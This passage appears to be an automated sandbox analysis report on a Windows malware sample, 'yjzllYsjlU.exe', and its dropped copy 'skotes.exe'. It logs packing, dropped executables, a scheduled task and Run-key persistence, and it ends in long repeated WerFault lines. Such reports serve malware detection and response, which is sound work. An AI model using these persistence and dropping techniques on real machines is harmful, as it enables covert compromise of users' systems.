                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: yjzllYsjlU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeUnpacked PE file: 0.2.yjzllYsjlU.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 21.2.skotes.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 28.2.skotes.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeUnpacked PE file: 0.2.yjzllYsjlU.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 21.2.skotes.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 28.2.skotes.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0042BF99 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0042BF99
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00411359 push es; ret 0_2_0041135A
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041D91C push ecx; ret 0_2_0041D92F
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041DFC6 push ecx; ret 0_2_0041DFD9
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00531490 pushad ; iretd 0_2_00531491
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_00547A09 push esi; iretd 0_2_00547A2C
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_021915C0 push es; ret 0_2_021915C1
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0219DB83 push ecx; ret 0_2_0219DB96
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_02180F97 push 0044C2D0h; retn 0044h0_2_02181269
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_00708851 push esi; iretd 21_2_00708874
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_006ED8F4 pushad ; retf 006Eh21_2_006ED8F5
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_006F22D8 pushad ; iretd 21_2_006F22D9
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_021815C0 push es; ret 21_2_021815C1
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_0218DB83 push ecx; ret 21_2_0218DB96
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 21_2_02170F97 push 0044C2D0h; retn 0044h21_2_02171269
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0041D91C push ecx; ret 28_2_0041D92F
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0041DFC6 push ecx; ret 28_2_0041DFD9
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_00620F97 push 0044C2D0h; retn 0044h28_2_00621269
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_006315C0 push es; ret 28_2_006315C1
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_0063DB83 push ecx; ret 28_2_0063DB96
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_006D5030 pushad ; iretd 28_2_006D5031
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 28_2_006EB5A9 push esi; iretd 28_2_006EB5CC
                  Source: yjzllYsjlU.exeStatic PE information: section name: .text entropy: 7.836216550722494
                  Source: skotes.exe.0.drStatic PE information: section name: .text entropy: 7.836216550722494
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1000023001\532d9160c6.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\1000026002\0f2a0c16ee.exeJump to dropped file
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0f2a0c16ee.exe
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0f2a0c16ee.exe
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeCode function: 0_2_0041C768 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041C768
                  Source: C:\Users\user\Desktop\yjzllYsjlU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
